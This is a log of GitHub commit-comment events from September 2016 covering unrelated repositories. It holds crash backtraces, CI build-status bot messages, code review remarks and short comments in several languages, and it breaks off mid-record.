{"id":"4587440706","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19090397,"position":null,"line":null,"path":null,"commit_id":"b78fbbce9e78b1275806cd43005dde568fca4c59","created_at":"2016-09-20T04:41:07Z","updated_at":"2016-09-20T04:41:07Z","body":"@peonso \r\n\r\nLog:\r\n```\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0xb5c31b40 (LWP 27546)]\r\n0x081120b7 in Tile::hasProperty (this=0x0, prop=prop@entry=BLOCKSOLID, checkSolidForItems=checkSolidForItems@entry=false) at tile.cpp:46\r\n46        if(ground && ground->hasProperty(prop)){\r\n(gdb) bt\r\n#0  0x081120b7 in Tile::hasProperty (this=0x0, prop=prop@entry=BLOCKSOLID, checkSolidForItems=checkSolidForItems@entry=false) at tile.cpp:46\r\nPython Exception <class 'IndexError'> list index out of range:\r\n#1  0x080d8ecc in AreaCombat::getList (this=0xb3b1e6b0, centerPos=..., targetPos=..., list=empty std::list) at combat.cpp:1259\r\n#2  0x080d9372 in Combat::CombatFunc (caster=caster@entry=0xb3adc7b8, pos=..., area=0xb3b1e6b0, params=...,\r\n    func=0x80d7450 <Combat::CombatHealthFunc(Creature*, Creature*, CombatParams const&, void*)>, data=0xb5c30ff8) at combat.cpp:806\r\n#3  0x080d9843 in Combat::doCombat (this=0xb3b4ddd8, caster=0xb3adc7b8, pos=...) at combat.cpp:917\r\n#4  0x080ba397 in CombatSpell::castSpell (this=0xb3b41580, creature=0xb3adc7b8) at spells.cpp:424\r\n#5  0x080ba567 in CombatSpell::castSpell (this=0xb3b41580, creature=0xb3adc7b8, target=0xb32706b8) at spells.cpp:459\r\n#6  0x08077734 in Monster::doAttacking (this=0xb3adc7b8, interval=1000) at monster.cpp:813\r\n#7  0x08129fa2 in Creature::onAttacking (this=0xb3adc7b8, interval=1000) at creature.cpp:274\r\n#8  0x0812eb55 in Creature::onThink (this=this@entry=0xb3adc7b8, interval=interval@entry=1000) at creature.cpp:263\r\n#9  0x08079663 in Monster::onThink (this=0xb3adc7b8, interval=1000) at monster.cpp:734\r\n#10 0x080acea5 in Game::checkCreatures (this=0x81fdf40 <g_game>) at game.cpp:3764\r\n#11 0x080e10e1 in operator() (this=0xb31c5020) at /usr/include/boost/function/function_template.hpp:767\r\n#12 operator() (this=0xb31c5018) at tasks.h:44\r\n#13 Dispatcher::dispatcherThread (p=0x81fdec0 <g_dispatcher>) at tasks.cpp:87\r\n#14 0xb7b72681 in ?? () from /usr/lib/i386-linux-gnu/libboost_thread.so.1.54.0\r\n#15 0xb7acef72 in start_thread (arg=0xb5c31b40) at pthread_create.c:312\r\n#16 0xb775ef8e in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:129\r\n```"}},"created_at":"2016-09-20T04:41:07Z"}
{"id":"4587440817","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19090398,"position":null,"line":null,"path":null,"commit_id":"e2fdacf73a0b07c854fcd68ebddb425ac57e388e","created_at":"2016-09-20T04:41:10Z","updated_at":"2016-09-20T04:41:10Z","body":"삭제요망합니다."}},"created_at":"2016-09-20T04:41:10Z"}
{"id":"4587440939","type":"CommitCommentEvent","actor":{"login":"etelem"},"repo":{"name":"etelem/personal-website"},"payload":{"comment":{"id":19090401,"position":39,"line":35,"path":"index.html","commit_id":"001ab557bedebea9c413feaaca131c6b14d733e9","created_at":"2016-09-20T04:41:12Z","updated_at":"2016-09-20T04:41:12Z","body":"ah got it, thanks!"}},"created_at":"2016-09-20T04:41:12Z"}
{"id":"4587441430","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19090403,"position":null,"line":null,"path":null,"commit_id":"8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554","created_at":"2016-09-20T04:41:23Z","updated_at":"2016-09-20T04:41:23Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T04:41:23Z"}
{"id":"4587443458","type":"CommitCommentEvent","actor":{"login":"iamstd"},"repo":{"name":"iamcoo/react"},"payload":{"comment":{"id":19090410,"position":null,"line":null,"path":null,"commit_id":"162cb96b0ceb4bb0260af51ba4e52aefa363411e","created_at":"2016-09-20T04:42:16Z","updated_at":"2016-09-20T04:42:16Z","body":"1. react in insurance\r\n2. babel in insurance\r\n3. es6 in insurance"}},"created_at":"2016-09-20T04:42:16Z"}
{"id":"4587445388","type":"CommitCommentEvent","actor":{"login":"bhollis"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":19090414,"position":null,"line":null,"path":null,"commit_id":"c048c512983afca0fc8fec58379da88a81d9c580","created_at":"2016-09-20T04:43:08Z","updated_at":"2016-09-20T04:43:08Z","body":"Good catch!"}},"created_at":"2016-09-20T04:43:08Z"}
{"id":"4587450867","type":"CommitCommentEvent","actor":{"login":"Fabien-Chouteau"},"repo":{"name":"AdaCore/Ada_Drivers_Library"},"payload":{"comment":{"id":19090431,"position":null,"line":null,"path":null,"commit_id":"9dcd3896b4e348aa9c8d179578e08b3cfb648abe","created_at":"2016-09-20T04:45:34Z","updated_at":"2016-09-20T04:45:34Z","body":"Jérôme, please port fatfs to HAL.Filesystem and make a clean HAL.Audio before pushing more non-portable code. "}},"created_at":"2016-09-20T04:45:34Z"}
{"id":"4587452811","type":"CommitCommentEvent","actor":{"login":"10alswhd"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090438,"position":null,"line":null,"path":null,"commit_id":"b457eca6e714343b644989bc2d56e07a95c84d9a","created_at":"2016-09-20T04:46:25Z","updated_at":"2016-09-20T04:46:25Z","body":"Counting_sort 프로그램 입니다."}},"created_at":"2016-09-20T04:46:25Z"}
{"id":"4587452861","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19090439,"position":20,"line":20,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-20T04:46:27Z","updated_at":"2016-09-20T04:46:27Z","body":"Agree\r\n\r\n_There are only two hard things in Computer Science: cache invalidation and naming things\r\n\r\n-- Phil Karlton_"}},"created_at":"2016-09-20T04:46:27Z"}
{"id":"4587454203","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19090442,"position":null,"line":null,"path":null,"commit_id":"f400b73b07a918107629487e81d2c70f7047c30a","created_at":"2016-09-20T04:47:00Z","updated_at":"2016-09-20T04:47:00Z","body":"```\r\nbut OVS may returns the empty list [] as the default value.\r\nBut Ryu expects an integer type as the default and fails to get \r\nthe port information in the table.\r\n```\r\n\r\n言いたいことはわかりますが、butが連続しているのは文章として微妙な気がします・・・\r\n口頭でも話がありましたが、片方の`But`を`On the other hand`か`Conversely`にしたほうがよいと思います。\r\n\r\n```\r\nAccording to ovs-vswitchd.conf.db(5), the tag column is an integer in range 0 to 4095.\r\nConversely, OVS may returns the empty list [] as the default value.\r\nHowever, Ryu expects an integer type as the default and fails to get\r\nthe port information in the table.\r\n```"}},"created_at":"2016-09-20T04:47:00Z"}
{"id":"4587454384","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19090443,"position":null,"line":null,"path":null,"commit_id":"8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554","created_at":"2016-09-20T04:47:04Z","updated_at":"2016-09-20T04:47:04Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-20T04:47:04Z"}
{"id":"4587454977","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090444,"position":null,"line":null,"path":null,"commit_id":"13675094088bf91680a1ba41197d0bc9d3f3a6d4","created_at":"2016-09-20T04:47:17Z","updated_at":"2016-09-20T04:47:17Z","body":"for some reason you insist to write this test case. Can I ask why ?? **What is this test solving or proving ?** In my opinion whatever you are trying to prove will be proven by  the compiler itself since it will result in a compilation error. "}},"created_at":"2016-09-20T04:47:17Z"}
{"id":"4587457139","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090452,"position":null,"line":null,"path":null,"commit_id":"9d2ee24090f293b00d16079ca0a7af6f2e50ab97","created_at":"2016-09-20T04:48:11Z","updated_at":"2016-09-20T04:48:11Z","body":"I dont think this commit has anything to do with RPS. Perhaps you tried merging some stuff. "}},"created_at":"2016-09-20T04:48:11Z"}
{"id":"4587459250","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":19090461,"position":22,"line":22,"path":"src/FileDocument.java","commit_id":"02612a22face8dd8b9dd765f611777c1852175de","created_at":"2016-09-20T04:49:04Z","updated_at":"2016-09-20T04:49:04Z","body":"@AntonLubushko in case `IOException` is thrown here, the lock will never be released"}},"created_at":"2016-09-20T04:49:04Z"}
{"id":"4587459580","type":"CommitCommentEvent","actor":{"login":"hyungtaecf"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090463,"position":null,"line":null,"path":null,"commit_id":"1547f816056d7821c3bca0269da73759727a6fe7","created_at":"2016-09-20T04:49:12Z","updated_at":"2016-09-20T04:49:12Z","body":"오류 나옵니다.\r\nC3861\t'search_pro': 식별자를 찾을 수 없습니다.\r\nC2065\t's': 선언되지 않은 식별자입니다.\r\nC3861\t'print_result': 식별자를 찾을 수 없습니다.\r\nC3861\t'gets': 식별자를 찾을 수 없습니다.\r\n"}},"created_at":"2016-09-20T04:49:12Z"}
{"id":"4587460702","type":"CommitCommentEvent","actor":{"login":"xAnavrins"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19090466,"position":null,"line":null,"path":null,"commit_id":"09d53223eb02c00332bfe2abd58177bf0e3eed55","created_at":"2016-09-20T04:49:41Z","updated_at":"2016-09-20T04:49:41Z","body":"Honestly, breaking numbers into binary numbers isn't really useful at all, there are much more efficient ways to handle data at the bit level."}},"created_at":"2016-09-20T04:49:41Z"}
{"id":"4587463296","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19090476,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-20T04:50:45Z","updated_at":"2016-09-20T04:50:45Z","body":"@CPSC310Bot "}},"created_at":"2016-09-20T04:50:45Z"}
{"id":"4587463507","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":19090478,"position":31,"line":31,"path":"src/FileDocument.java","commit_id":"02612a22face8dd8b9dd765f611777c1852175de","created_at":"2016-09-20T04:50:51Z","updated_at":"2016-09-20T04:50:51Z","body":"@AntonLubushko same here"}},"created_at":"2016-09-20T04:50:51Z"}
{"id":"4587465914","type":"CommitCommentEvent","actor":{"login":"gavinmcdermott"},"repo":{"name":"IDEO-coLAB/nomad"},"payload":{"comment":{"id":19090492,"position":null,"line":null,"path":null,"commit_id":"ca78e137f4d25c552c1640b025a0dfa7577fa47d","created_at":"2016-09-20T04:51:54Z","updated_at":"2016-09-20T04:51:54Z","body":"Thanks for the clean up!"}},"created_at":"2016-09-20T04:51:54Z"}
{"id":"4587466815","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19090494,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-20T04:52:16Z","updated_at":"2016-09-20T04:52:16Z","body":"@CPSC310Bot "}},"created_at":"2016-09-20T04:52:16Z"}
{"id":"4587466884","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19090495,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-20T04:52:18Z","updated_at":"2016-09-20T04:52:18Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-20T04:52:18Z"}
{"id":"4587467160","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19090496,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-20T04:52:26Z","updated_at":"2016-09-20T04:52:26Z","body":"1 passing, 1 failing (12.5%)\nName of first spec to fail: Should not be able to set a valid zip that does not contain an invalid dataset"}},"created_at":"2016-09-20T04:52:26Z"}
{"id":"4587468300","type":"CommitCommentEvent","actor":{"login":"thinkyhead"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19090500,"position":null,"line":null,"path":null,"commit_id":"9a9e9afcf81a6eb7b7515df41bc2a1b099f8b849","created_at":"2016-09-20T04:52:54Z","updated_at":"2016-09-20T04:52:54Z","body":"@MagoKimbra That's interesting… But does it also read 90 when it's in \"stowed\" state too? Maybe it's getting stuck but then not noticing that it is…? Or does it change color too?"}},"created_at":"2016-09-20T04:52:54Z"}
{"id":"4587468802","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":19090502,"position":21,"line":27,"path":"src/test/Tests.java","commit_id":"02612a22face8dd8b9dd765f611777c1852175de","created_at":"2016-09-20T04:53:09Z","updated_at":"2016-09-20T04:53:09Z","body":"@AntonLubushko test name should reflect what it is testing. What are you testing here? "}},"created_at":"2016-09-20T04:53:09Z"}
{"id":"4587469862","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090506,"position":28,"line":26,"path":"src/test/java/com/tdd/checkout/RockPaperScissorsTest.java","commit_id":"1d4f8b7ca7ccbea32123228b69bd534be1261aca","created_at":"2016-09-20T04:53:34Z","updated_at":"2016-09-20T04:53:34Z","body":"test cases names should communicate the intent of the test case. In this case a better name would be ``rockWinsOverScissors``"}},"created_at":"2016-09-20T04:53:34Z"}
{"id":"4587470098","type":"CommitCommentEvent","actor":{"login":"semioner"},"repo":{"name":"semioner/demos"},"payload":{"comment":{"id":19090507,"position":2,"line":2,"path":"README.md","commit_id":"05077ec9dcde537a2c6cefe62102c26f20ecdf99","created_at":"2016-09-20T04:53:42Z","updated_at":"2016-09-20T04:53:42Z","body":"NIO读取文件，NIO实现socket通讯"}},"created_at":"2016-09-20T04:53:42Z"}
{"id":"4587471195","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090510,"position":10,"line":10,"path":"src/main/java/com/tdd/rockpaperscissors/RockPaperScissors.java","commit_id":"1d4f8b7ca7ccbea32123228b69bd534be1261aca","created_at":"2016-09-20T04:54:12Z","updated_at":"2016-09-20T04:54:12Z","body":"Dont understand the boolean return type. I see you have changed it down the line. But still why boolean. In that case the method should have been called ``scissorsWinsOverPaper``"}},"created_at":"2016-09-20T04:54:12Z"}
{"id":"4587472685","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090515,"position":null,"line":null,"path":null,"commit_id":"1d4f8b7ca7ccbea32123228b69bd534be1261aca","created_at":"2016-09-20T04:54:51Z","updated_at":"2016-09-20T04:54:51Z","body":"good you have a failing test case. first "}},"created_at":"2016-09-20T04:54:51Z"}
{"id":"4587476825","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090529,"position":12,"line":16,"path":"src/main/java/com/tdd/rockpaperscissors/RockPaperScissors.java","commit_id":"c08b4066d2f6343b80b91ffd5f4a7b43c8a44264","created_at":"2016-09-20T04:56:36Z","updated_at":"2016-09-20T04:56:36Z","body":"very difficult to read / undersatnd. And usually not a good idea to use terneary operators..\r\n\r\nThe whole approach with priority is unique.. I dont get it easily.. I dont see it as priority as well. In the game rock, paper and scissors are equally balanced. They dont have a priority hiearachy. The all have a small advanatge over other and disadvantage with someone else.. Hence priority in the class / domain object is a **misplaced / wrong** concept"}},"created_at":"2016-09-20T04:56:36Z"}
{"id":"4587477245","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090531,"position":14,"line":27,"path":"src/test/java/com/tdd/checkout/RockPaperScissorsTest.java","commit_id":"c08b4066d2f6343b80b91ffd5f4a7b43c8a44264","created_at":"2016-09-20T04:56:48Z","updated_at":"2016-09-20T04:56:48Z","body":"much better tnames"}},"created_at":"2016-09-20T04:56:48Z"}
{"id":"4587477599","type":"CommitCommentEvent","actor":{"login":"chrisvfritz"},"repo":{"name":"vuejs/vue-migration-helper"},"payload":{"comment":{"id":19090532,"position":12,"line":17,"path":"helpers/check-for-deprecations.js","commit_id":"0a95b214c367dfd1395a7ced494d982f74cac625","created_at":"2016-09-20T04:56:59Z","updated_at":"2016-09-20T04:56:59Z","body":"Yep."}},"created_at":"2016-09-20T04:56:59Z"}
{"id":"4587478372","type":"CommitCommentEvent","actor":{"login":"satin1004"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090535,"position":11,"line":20,"path":"selectionSort.cpp","commit_id":"70188b49d2b1425fe1a86d56e2f7d0b687029841","created_at":"2016-09-20T04:57:19Z","updated_at":"2016-09-20T04:57:19Z","body":"} 삭제 해야할 거 같아용"}},"created_at":"2016-09-20T04:57:19Z"}
{"id":"4587478797","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090537,"position":6,"line":6,"path":"src/main/java/com/tdd/rockpaperscissors/models/Gamer.java","commit_id":"c7279daba596fe96bbfec74fb7d2503c818c40b4","created_at":"2016-09-20T04:57:30Z","updated_at":"2016-09-20T04:57:30Z","body":"why not an interface. Why a class. ??"}},"created_at":"2016-09-20T04:57:30Z"}
{"id":"4587478982","type":"CommitCommentEvent","actor":{"login":"obscenesensi"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19090538,"position":null,"line":null,"path":null,"commit_id":"2f02d3eb246b9e0b532551f7d1befc3d4314a188","created_at":"2016-09-20T04:57:35Z","updated_at":"2016-09-20T04:57:35Z","body":"."}},"created_at":"2016-09-20T04:57:35Z"}
{"id":"4587479224","type":"CommitCommentEvent","actor":{"login":"kegebai"},"repo":{"name":"ltebean/LTNavigationBar"},"payload":{"comment":{"id":19090540,"position":null,"line":null,"path":null,"commit_id":"5db4c033ab89b174d58640fe4fcfacfd689f8201","created_at":"2016-09-20T04:57:41Z","updated_at":"2016-09-20T04:57:41Z","body":"自定义的navigationBar不可以设置颜色吗？"}},"created_at":"2016-09-20T04:57:41Z"}
{"id":"4587479919","type":"CommitCommentEvent","actor":{"login":"xs3mm"},"repo":{"name":"TehCheat/PoEHUD"},"payload":{"comment":{"id":19090545,"position":null,"line":null,"path":null,"commit_id":"975c8ef67ed31bdc68025c7bcca152a4feb56748","created_at":"2016-09-20T04:58:01Z","updated_at":"2016-09-20T04:58:01Z","body":"hey sir GarenaTW 2.4.0f  need your help !\r\n\r\nThanks very much !"}},"created_at":"2016-09-20T04:58:01Z"}
{"id":"4587480148","type":"CommitCommentEvent","actor":{"login":"kegebai"},"repo":{"name":"ltebean/LTNavigationBar"},"payload":{"comment":{"id":19090547,"position":null,"line":null,"path":null,"commit_id":"5db4c033ab89b174d58640fe4fcfacfd689f8201","created_at":"2016-09-20T04:58:05Z","updated_at":"2016-09-20T04:58:05Z","body":"在你没有适配iOS10以前是可以的"}},"created_at":"2016-09-20T04:58:05Z"}
{"id":"4587480591","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19090549,"position":13,"line":11,"path":"src/main/java/com/tdd/rockpaperscissors/RockPaperScissors.java","commit_id":"c7279daba596fe96bbfec74fb7d2503c818c40b4","created_at":"2016-09-20T04:58:15Z","updated_at":"2016-09-20T04:58:15Z","body":"The method name ``executeRP`` needs a closer look. RP is an acronym which we try and avoid.. Also the game has now extended to RPS.. You havent changed the name"}},"created_at":"2016-09-20T04:58:15Z"}
{"id":"4587480754","type":"CommitCommentEvent","actor":{"login":"Trafalgar-Square"},"repo":{"name":"flo071/android_device_oneplus_oneplus3"},"payload":{"comment":{"id":19090550,"position":null,"line":null,"path":null,"commit_id":"ffbe039df1fcd25175789cf4a74b461f2f566db7","created_at":"2016-09-20T04:58:20Z","updated_at":"2016-09-20T04:58:20Z","body":"But you could have reverted this change too: https://github.com/flo071/android_device_oneplus_oneplus3/commit/41e559dfbebcecf53cfa84abe6f7a31c5197fb65\r\n:+1: "}},"created_at":"2016-09-20T04:58:20Z"}
{"id":"4587481398","type":"CommitCommentEvent","actor":{"login":"larry-xu"},"repo":{"name":"mwhittaker/aries"},"payload":{"comment":{"id":19090551,"position":null,"line":null,"path":null,"commit_id":"347828d089a62594d1832fbe31c6d392bf2f286d","created_at":"2016-09-20T04:58:34Z","updated_at":"2016-09-20T04:58:34Z","body":"Oh dear :astonished: :fire: "}},"created_at":"2016-09-20T04:58:34Z"}
{"id":"4587482677","type":"CommitCommentEvent","actor":{"login":"chrisvfritz"},"repo":{"name":"vuejs/vue-migration-helper"},"payload":{"comment":{"id":19090559,"position":12,"line":17,"path":"helpers/check-for-deprecations.js","commit_id":"0a95b214c367dfd1395a7ced494d982f74cac625","created_at":"2016-09-20T04:59:04Z","updated_at":"2016-09-20T04:59:04Z","body":"Updated now."}},"created_at":"2016-09-20T04:59:04Z"}
{"id":"4587483709","type":"CommitCommentEvent","actor":{"login":"kyleshay"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":19090562,"position":null,"line":null,"path":null,"commit_id":"c048c512983afca0fc8fec58379da88a81d9c580","created_at":"2016-09-20T04:59:30Z","updated_at":"2016-09-20T04:59:30Z","body":"Thanks, haha. Had a breakpoint on the save while testing something else... It was being hit every time I opened or closed the move-popup. >_<"}},"created_at":"2016-09-20T04:59:30Z"}
{"id":"4587484216","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19090563,"position":null,"line":null,"path":null,"commit_id":"e965a723788ff69825e09a2262a66f21d37239a3","created_at":"2016-09-20T04:59:43Z","updated_at":"2016-09-20T04:59:43Z","body":"파일 올리실 때, 파일이름 입력란  \"OnePiece/폴더이름/파일이름\" 순으로 올리셔야 폴더안에 파일이 등록됩니다. 참고하세요."}},"created_at":"2016-09-20T04:59:43Z"}
{"id":"4587484316","type":"CommitCommentEvent","actor":{"login":"jmromeroes"},"repo":{"name":"jmromeroes/TheGreatBattle"},"payload":{"comment":{"id":19090564,"position":null,"line":null,"path":null,"commit_id":"67eb20baee1833c12b075a09048d6630f8f0216a","created_at":"2016-09-20T04:59:45Z","updated_at":"2016-09-20T04:59:45Z","body":"Jeje Un jueguillo que ando haciendo en Scala. :dart: "}},"created_at":"2016-09-20T04:59:45Z"}
{"id":"4587484756","type":"CommitCommentEvent","actor":{"login":"hyungtaecf"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090574,"position":null,"line":null,"path":null,"commit_id":"2fed1a2354c7415d7c1cb707800932fdf0f4919b","created_at":"2016-09-20T04:59:56Z","updated_at":"2016-09-20T04:59:56Z","body":"확인했습니다."}},"created_at":"2016-09-20T04:59:56Z"}
{"id":"4587484955","type":"CommitCommentEvent","actor":{"login":"KTH9715"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19090576,"position":null,"line":null,"path":null,"commit_id":"0fa86e5c0eccad9e29ab972ec92a600afe21e683","created_at":"2016-09-20T05:00:01Z","updated_at":"2016-09-20T05:00:01Z","body":"완벽한 감자입니다"}},"created_at":"2016-09-20T05:00:01Z"}
{"id":"4587488310","type":"CommitCommentEvent","actor":{"login":"obscenesensi"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19090588,"position":3,"line":3,"path":"gistfile1.rb","commit_id":"bb7bc781cca47489dcf46cf26b16b5b0f861acdc","created_at":"2016-09-20T05:01:19Z","updated_at":"2016-09-20T05:01:19Z","body":"xddd"}},"created_at":"2016-09-20T05:01:19Z"}
{"id":"4587488338","type":"CommitCommentEvent","actor":{"login":"gavinmcdermott"},"repo":{"name":"IDEO-coLAB/nomad"},"payload":{"comment":{"id":19090589,"position":42,"line":101,"path":"src/utils/ipfs.js","commit_id":"375bf14c3f561bc7eef1bf27214786b12cee2c80","created_at":"2016-09-20T05:01:19Z","updated_at":"2016-09-20T05:01:19Z","body":"Just a note here that we might start considering a universal error handler for Nomad some time soon."}},"created_at":"2016-09-20T05:01:19Z"}
{"id":"4587488620","type":"CommitCommentEvent","actor":{"login":"simvery"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090592,"position":null,"line":null,"path":null,"commit_id":"1547f816056d7821c3bca0269da73759727a6fe7","created_at":"2016-09-20T05:01:26Z","updated_at":"2016-09-20T05:01:26Z","body":"gets랑 선언"}},"created_at":"2016-09-20T05:01:26Z"}
{"id":"4587488826","type":"CommitCommentEvent","actor":{"login":"gavinmcdermott"},"repo":{"name":"IDEO-coLAB/nomad"},"payload":{"comment":{"id":19090593,"position":null,"line":null,"path":null,"commit_id":"375bf14c3f561bc7eef1bf27214786b12cee2c80","created_at":"2016-09-20T05:01:31Z","updated_at":"2016-09-20T05:01:31Z","body":"Awesome!"}},"created_at":"2016-09-20T05:01:31Z"}
{"id":"4587491841","type":"CommitCommentEvent","actor":{"login":"luk1337"},"repo":{"name":"CyanogenMod/android_device_motorola_msm8226-common"},"payload":{"comment":{"id":19090601,"position":null,"line":null,"path":null,"commit_id":"9886760007f5fd9a67916a115833b6f4b60068c1","created_at":"2016-09-20T05:02:45Z","updated_at":"2016-09-20T05:02:45Z","body":"It works partially, we are having issues with video recording ( it works\nonly in few apps ).\n\nOn Sep 20, 2016 04:06, \"子龙zj\" <notifications@github.com> wrote:\n\n> Excuse me. The Moto msm8226 cm14, camera working?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CyanogenMod/android_device_motorola_msm8226-common/commit/9886760007f5fd9a67916a115833b6f4b60068c1#commitcomment-19089187>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGg7g-taMgN7--HuYzgP8fFB-URBofv7ks5qrz-ZgaJpZM4KBJnd>\n> .\n>\n"}},"created_at":"2016-09-20T05:02:45Z"}
{"id":"4587492010","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19090602,"position":null,"line":null,"path":null,"commit_id":"2c5b9080ad485953ecfea5770102d1b241e991c9","created_at":"2016-09-20T05:02:49Z","updated_at":"2016-09-20T05:02:49Z","body":"The point is that it is just better to report an issue on Alpine image issues tracker than using \"apk upgrade\"."}},"created_at":"2016-09-20T05:02:49Z"}
{"id":"4587493605","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090603,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T05:03:27Z","updated_at":"2016-09-20T05:03:27Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1765 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a 